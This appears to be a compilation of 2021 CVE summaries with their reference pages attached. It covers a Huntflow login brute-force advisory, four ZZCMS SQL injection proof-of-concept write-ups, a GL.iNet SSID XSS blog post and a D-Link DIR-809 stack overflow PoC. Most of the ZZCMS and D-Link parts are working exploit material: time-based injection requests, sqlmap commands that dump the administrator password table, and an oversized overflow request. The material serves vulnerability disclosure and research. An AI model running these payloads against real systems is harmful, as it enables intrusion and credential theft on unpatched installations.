Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.

CVE-2021-37934 ------------------------------------------ Insufficient server-side login-attempt limit ------------------------------------------ \[Suggested description\] Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[Additional Information\] Example login request to /account/login: POST /account/login HTTP/1.1 Host: hf.mydomain Connection: close Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://hf.mydomain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://hf.mydomain/account/login Accept-Encoding: gzip, deflate Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: lang=ru\_RU; \_xsrf=2|b65eb986|309cc18c34ff994a04ca856397c5f300|1619468100; token=5kafeoqj6vk2tb3mmx31wyl8zvc1ti7mtfpkretj2k38qgdaddl5wl07yz0tjiwm; \_xsrf=2%7Cb65eb986%7C309cc18c34ff994a04ca856397c5f300%7C1619468100&email=user123&password=p@ssw0rd There is no any server-side login-attempt limit and attacker can perform multiple login attempts for brute-force password guessing. ------------------------------------------ \[VulnerabilityType Other\] CWE-307: Improper Restriction of Excessive Authentication Attempts ------------------------------------------ \[Vendor of Product\] Huntflow ------------------------------------------ \[Affected Product Code Base\] Huntflow Enterprise - Affected < 3.10.14. Fixed at 3.10.14. Tested at 3.6.1 ------------------------------------------ \[Affected Component\] "/account/login" HTTP method ------------------------------------------ \[Attack Type\] Remote - unauthenticated users ------------------------------------------ \[CVE Impact\] Brute-force password attacks ------------------------------------------ \[Attack Vectors\] To exploit send multiple login attempts to the Huntflow Enterprise "/account/login" HTTP method ------------------------------------------ \[Reference\] https://huntflow.ru https://gist.github.com/andrey-lomtev/4ec9004101152ea9d0043a09d59498a6 ------------------------------------------ \[Has vendor confirmed or acknowledged the vulnerability?\] true ------------------------------------------ \[Discoverer\] Andrey Lomtev ------------------------------------------ Andrey Lomtev / Infosec.ru team

CVE-2021-37934: CVE-2021-37934

OpUtils in Zoho ManageEngine OpManager 12.5 before 125490 mishandles authentication for a few audit directories.

CVE-2021-44514: Read me | OpManager Help

When using the dart pub publish command to publish a package to a third-party package server, the request would be authenticated with an oauth2 access_token that is valid for publishing on pub.dev. Using these obtained credentials, an attacker can impersonate the user on pub.dev. We recommend upgrading past https://github.com/dart-lang/sdk/commit/d787e78d21e12ec1ef712d229940b1172aafcdf8 or beyond version 2.15.0 

CVE-2021-22568: sdk/CHANGELOG.md at main · dart-lang/sdk

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, abd 2021 in dl/dl_download.php. when registering ordinary users.

**ZZCMS2021\_sqlinject\_1****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_download.php`

<?php
include("../inc/conn.php");
...
#line 11-21
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');	
	}
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 68-72
if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") order by id desc";
}else{
$sql\="select \* from zzcms\_dl where passed=1  and id='$id'";
}

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827000715985.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827002132182.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_download.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827003242950.png

CVE-2021-40282: ZZCMS2021 sqlinject(1)

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 in dl/dl_print.php when registering ordinary users.

**ZZCMS2021\_sqlinject\_2****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `dl/dl_print.php`

<?php
include("../inc/conn.php");
...
#line 29-40
$id\="";
$i\=0;
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $id\=$id.($\_POST\['id'\]\[$i\].',');
    }
	
}else{
	$founderr\=1;
	$ErrMsg\="<li>操作失败！请先选中要下载的信息</li>";
}
$id\=substr($id,0,strlen($id)-1);//去除最后面的","
...
#line 77-83
if (strpos($id,",")>0){
	$sql\="select \* from zzcms\_dl where passed=1 and id in (". $id .") ";
	}else{
	$sql\="select \* from zzcms\_dl where passed=1  and id=".$id." order by id desc";
}
	
$rs\=query($sql);

Before you exploit the vulnerability, you need to visit this link to register users:

http://127.0.0.1/reg/userreg.php

When you have an account, visit this link and the POC is as follows.

POC:

    POST /dl/dl_download.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/dl/dl_download.php
    Cookie: UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827005508639.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827005636669.png)

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827010301240.png)

CVE-2021-40281: ZZCMS2021 sqlinject(2)

An SQL Injection vulnerablitly exits in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/dl_sendmail.php.

**ZZCMS2021\_sqlinject\_4****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `admin/dl_sendmail.php`

<?php 
include("admin.php");
...
#line 17-38
include("../inc/mail\_class.php");
checkadminisdo("dl");
$id\="";
if(!empty($\_POST\['id'\])){
    for($i\=0; $i<count($\_POST\['id'\]);$i++){
    $ids\=$\_POST\['id'\]\[$i\];
	$ids\=explode("|",$ids);
	//$id=$ids\[0\];
	$id\=$id.($ids\[0\].',');
	}
	$id\=substr($id,0,strlen($id)-1);//去除最后面的","
}else{
echo "<script lanage='javascript'>alert('操作失败！至少要选中一条信息。');window.opener=null;window.open('','\_self');window.close()</script>";
exit;
}

if (strpos($id,",")>0){
$sql\="select \* from zzcms\_dl where saver<>'' and id in (". $id .")";//没有接收人的，非留言类代理不用发提示邮件。
}else{
$sql\="select \* from zzcms\_dl where saver<>'' and id='".$id."'";
}
$rs\=query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/dl\_sendmail.php

POC:

    POST /admin/dl_sendmail.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/dl_sendmail.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(5)))a)
    

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827014436700.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827014910309.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/admin/dl\_sendmail.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827015328234.png

CVE-2021-40280: ZZCMS2021 sqlinject(4)

An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, and 2021 via the id parameter in admin/bad.php.

**ZZCMS2021\_sqlinject\_3****PoC by BaizeSec\_ahui****ZZCMS the lastest version download page :**

http://www.zzcms.net/about/6.htm

**zip installer:**

http://www.zzcms.net/download/zzcms2021.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**vulnerability code:**

in file `/admin/bad.php`

<?php include("admin.php");?>
...
#line 10-41
checkadminisdo("badusermessage");
$action=isset($\_REQUEST\["action"\])?$\_REQUEST\["action"\]:'';
if ($action<\>""){
	$id="";
	if(!empty($\_POST\['id'\])){
    	for($i=0; $i<count($\_POST\['id'\]);$i++){
    	$id=$id.($\_POST\['id'\]\[$i\].',');
    	}
	$id=substr($id,0,strlen($id)-1);//去除最后面的","
	}

	if ($id==""){
	echo "<script\>alert('操作失败！至少要选中一条信息。');history.back();</script\>";
	}
}
if ($action=="del"){
	 if (strpos($id,",")\>0){
		$sql="delete from zzcms\_bad where id in (". $id .")";
	}else{
		$sql="delete from zzcms\_bad where id='$id'";
	}

query($sql);
echo "<script\>location.href\='bad.php'</script\>";
}
if ($action=="lockip"){
	 if (strpos($id,",")\>0){
		$sql="update  zzcms\_bad set lockip=1 where id in (". $id .")";
	}else{
		$sql="update  zzcms\_bad set lockip=1 where id='$id'";
	}
query($sql);

**Before you exploit this vulnerability, you need to find a way to obtain the permission of background administrator**

After you obtain the administrator user rights and log in, visit the following link to exploit the vulnerability:

http://yourhost/admin/bad.php

POC:

    POST /admin/bad.php HTTP/1.1
    Host: your host
    User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 69
    Origin: http://zzcms.com
    Connection: close
    Referer: http://zzcms.com/admin/bad.php
    Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
    Upgrade-Insecure-Requests: 1
    
    action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
    

**You can change the post parameter action to del or lockip**

sleep(9):

Screenshot link:http://39.101.130.53/image-20210827011634912.png

You can also use sqlmap to verify this vulnerability. The specific usage is as follows:

**Note: please replace cookies and URLs with your own and make sure they are correct**

python sqlmap.py -u "http://zzcms.com/admin/bad.php" --cookie="admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;" --method POST --data "action=del&id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" --flush-session --current-user --batch

Screenshot link:http://39.101.130.53/image-20210827012018026.png

After waiting for a while, you can get the information you query, or you can change the statement. For example, the following statement is used to query the password of the administrator user:

python sqlmap.py -u "http://zzcms.com/dl/dl\_print.php" --cookie="UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6" --method POST --data "id\[0\]=0&id\[1\]=1" -p id\[1\] --tamper="between.py" -D zzcms2021 -T zzcms\_admin -C pass --dump  --batch

Screenshot link:http://39.101.130.53/image-20210827012641294.png

CVE-2021-40279: ZZCMS2021 sqlinject(3)

GL.iNet GL-AR150 2.x before 3.x devices, configured as repeaters, allow cgi-bin/router_cgi?action=scanwifi XSS when an attacker creates an SSID with an XSS payload as the name.

**I accidentally got my 4th CVE.****CVE ID: CVE-2021-44148**

Don't get too excited, it's just an XSS. Just a standard XSS.

I’m about to go full recipe blog:

The story of this CVE begins in 2014 when I first heard of the wifi pineapple from Hak5. At the time, I was working in IT making 30k a year and paying for my ex-wife to go to college. I did not have $100 bucks or whatever it was to drop on a wifi-pineapple. In 2016 I saw blog articles like these:

*   http://sapinski.com/2016/02/13/wifi-pineapple-firmware-for-gl-inet-gl-ar150/
*   https://www.securityaddicted.com/2016/11/17/weaponizing-gl-inet-gl-ar150/
*   https://jerrygamblin.com/2016/04/11/turning-a-25-gl-ar150-into-a-100-wifipineapple/?platform=hootsuite

All claiming you could buy a $25 mini router and turn it into a wifi pineapple. I instantly bought one.

![](https://beaugraham.com/images/order.png)

But because of my 2x diagnosed ADHD/ADD I never even got as far as installing the wifi pineapple firmware. It had taken about a week to get to my house and by that time I had become obsessed with something else.

Fast forward to 2019.

I started working as a pentester in July-ish of 2019. Specifically working on web application pentests. At this time whenever I see something on Twitter or LinkedIn about something web-app pentest or bug bounty related, I read it. I came across this blog post:

https://infosecwriteups.com/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968

Reading this made me realize that literally any input could be an XSS and I thought to myself I may as well make an XSS SSID just in case for the future. I have Ubiquiti equipment at home so it was easy enough to create an SSID called <script>alert(2)</script>. Keep in mind that SSID’s have to be less than 32 characters.

Fast forward to late 2021. The pandemic has been “almost over” for a year now.

People are starting to go back into the office. I can’t really talk about what I was working on but for a pentest I needed a little router. I remembered back when I bought my GL-AR150 in 2016. I had since moved 5 times. In my last move I decided to index everything that was in each box so I found it relatively fast.

I plugged it in and connected to the default network it provided. After setting a root password, I logged in and started navigating around the menus to see if anything would be helpful for my pentest or if I should just install default openwrt.

![alert](https://beaugraham.com/images/alert.png)

Seemingly out of nowhere I get this popup. For about 4 seconds I was like “WUT….” and then it all clicked. I was on the repeater page where it searches for wifi networks. My SSID that I had made in 2019 finally did something.

At this point I just started laughing. I couldn't believe it. My wife thought something was wrong because of the noises that were coming out of my home office.

I didn’t have time to create a real XSS payload like I normally do but I still felt good about finding this one. I decided to take it just one step further using xsshunter.com.

As you remember an SSID can only be 32 characters. So my normal xsshunter payloads weren’t going to work. So instead I followed this blog post and created a short domain that forwarded to my normal xsshunter payload page:

https://medium.com/@mohameddaher/how-i-paid-2-for-1054-xss-bug-20-chars-blind-xss-payloads-12d32760897b

So now I have an SSID that has my xsshunter payload in it just in case this happens again. So now I’ll get notifications:

![](https://beaugraham.com/images/notification.png)

Something else to remember is that this was purchased in 2016. It had an extremely old firmware on it. So when I found this bug it was running on firmware version 2.19 and the bug was fixed in version 3 of the firmware. The current version as of writing is 3.203. More can be found here:

https://docs.gl-inet.com/en/3/release\_notes/

TL;DR:

XSS payload as WiFi SSID leads to reflected XSS.

Timeline:

*   Nov 16th 2021 Found bug
*   Nov 17th 2021 Notified company of bug via email
*   Bug has already been fixed in version 3.x of firmware.
*   Nov 20th submit for CVE
*   Nov 22nd CVE reserved

CVE-2021-44148: Beau Graham

Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php.

CVE-2021-35414: Security issues - Chamilo LMS

D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function sub_80046EB4 in /formSetPortTr. This vulnerability is triggered via a crafted POST request.

**D-Link DIR809 Vulnerability**

The Vulnerability is in page `/formSetPortTr` which influences the latest version of this router OS.

The firmware version is DIR-809Ax\_FW1.12WWB03\_20190410

**Progress**

*   Confirmed by vendor.

**Vulnerability description**

In the function `sub_80046EB4`( page `/formSetPortTr` ), we find a stack overflow vulnerability, which allows attackers to execute arbitrary code on system via a crafted post request.

Here is the description of the first vulnerability,

1.  The `get_var` function extracts user input from the a http request. For example, the code below will extract the value of a key of format `"inputPortRng_%d"` in the http post request which is completely under the attacker's control.
2.  The string `v25` obtained from user is copied onto the stack using `strcpy` without checking its length. So we can make the stack buffer overflow in `v16`.

![2021-05-13_14h15_00](https://github.com/Lnkvct/IoT-poc/raw/master/D-Link-DIR809/vuln11/README/2021-05-13_14h15_00.png)

    POST /formSetPortTr.htm HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 4210
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.0.1/Advanced/Special_Applications.asp
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: uid=YF608CCB25
    Connection: close
    
    settingsChanged=1&curTime=1620559041239&HNAP_AUTH=6946CD2354C87A2E9E189EFFB61EECD9+1620559041&submit-url=%2FAdvanced%2FSpecial_Applications.asp&used_0=0&enabled_0=0&entry_name_0=aaa&trigPortRng_0=aa&trigPortPtc_0=6&sched_name_0=aaaaaaaaa&inputPortRng_0=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&inputPortPtc_0=6&used_1=0&enabled_1=0&entry_name_1=&trigPortRng_1=&trigPortPtc_1=6&sched_name_1=Always&inputPortRng_1=&inputPortPtc_1=6&used_2=0&enabled_2=0&entry_name_2=&trigPortRng_2=&trigPortPtc_2=6&sched_name_2=Always&inputPortRng_2=&inputPortPtc_2=6&used_3=0&enabled_3=0&entry_name_3=&trigPortRng_3=&trigPortPtc_3=6&sched_name_3=Always&inputPortRng_3=&inputPortPtc_3=6&used_4=0&enabled_4=0&entry_name_4=&trigPortRng_4=&trigPortPtc_4=6&sched_name_4=Always&inputPortRng_4=&inputPortPtc_4=6&used_5=0&enabled_5=0&entry_name_5=&trigPortRng_5=&trigPortPtc_5=6&sched_name_5=Always&inputPortRng_5=&inputPortPtc_5=6&used_6=0&enabled_6=0&entry_name_6=&trigPortRng_6=&trigPortPtc_6=6&sched_name_6=Always&inputPortRng_6=&inputPortPtc_6=6&used_7=0&enabled_7=0&entry_name_7=&trigPortRng_7=&trigPortPtc_7=6&sched_name_7=Always&inputPortRng_7=&inputPortPtc_7=6&used_8=0&enabled_8=0&entry_name_8=&trigPortRng_8=&trigPortPtc_8=6&sched_name_8=Always&inputPortRng_8=&inputPortPtc_8=6&used_9=0&enabled_9=0&entry_name_9=&trigPortRng_9=&trigPortPtc_9=6&sched_name_9=Always&inputPortRng_9=&inputPortPtc_9=6&used_10=0&enabled_10=0&entry_name_10=&trigPortRng_10=&trigPortPtc_10=6&sched_name_10=Always&inputPortRng_10=&inputPortPtc_10=6&used_11=0&enabled_11=0&entry_name_11=&trigPortRng_11=&trigPortPtc_11=6&sched_name_11=Always&inputPortRng_11=&inputPortPtc_11=6&used_12=0&enabled_12=0&entry_name_12=&trigPortRng_12=&trigPortPtc_12=6&sched_name_12=Always&inputPortRng_12=&inputPortPtc_12=6&used_13=0&enabled_13=0&entry_name_13=&trigPortRng_13=&trigPortPtc_13=6&sched_name_13=Always&inputPortRng_13=&inputPortPtc_13=6&used_14=0&enabled_14=0&entry_name_14=&trigPortRng_14=&trigPortPtc_14=6&sched_name_14=Always&inputPortRng_14=&inputPortPtc_14=6&used_15=0&enabled_15=0&entry_name_15=&trigPortRng_15=&trigPortPtc_15=6&sched_name_15=Always&inputPortRng_15=&inputPortPtc_15=6&used_16=0&enabled_16=0&entry_name_16=&trigPortRng_16=&trigPortPtc_16=6&sched_name_16=Always&inputPortRng_16=&inputPortPtc_16=6&used_17=0&enabled_17=0&entry_name_17=&trigPortRng_17=&trigPortPtc_17=6&sched_name_17=Always&inputPortRng_17=&inputPortPtc_17=6&used_18=0&enabled_18=0&entry_name_18=&trigPortRng_18=&trigPortPtc_18=6&sched_name_18=Always&inputPortRng_18=&inputPortPtc_18=6&used_19=0&enabled_19=0&entry_name_19=&trigPortRng_19=&trigPortPtc_19=6&sched_name_19=Always&inputPortRng_19=&inputPortPtc_19=6&used_20=0&enabled_20=0&entry_name_20=&trigPortRng_20=&trigPortPtc_20=6&sched_name_20=Always&inputPortRng_20=&inputPortPtc_20=6&used_21=0&enabled_21=0&entry_name_21=&trigPortRng_21=&trigPortPtc_21=6&sched_name_21=Always&inputPortRng_21=&inputPortPtc_21=6&used_22=0&enabled_22=0&entry_name_22=&trigPortRng_22=&trigPortPtc_22=6&sched_name_22=Always&inputPortRng_22=&inputPortPtc_22=6&used_23=0&enabled_23=0&entry_name_23=&trigPortRng_23=&trigPortPtc_23=6&sched_name_23=Always&inputPortRng_23=&inputPortPtc_23=6
    

**Acknowledgment**

Credit to @Ainevsia, @peanuts62, @Yu3H0 from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

Tag

#apple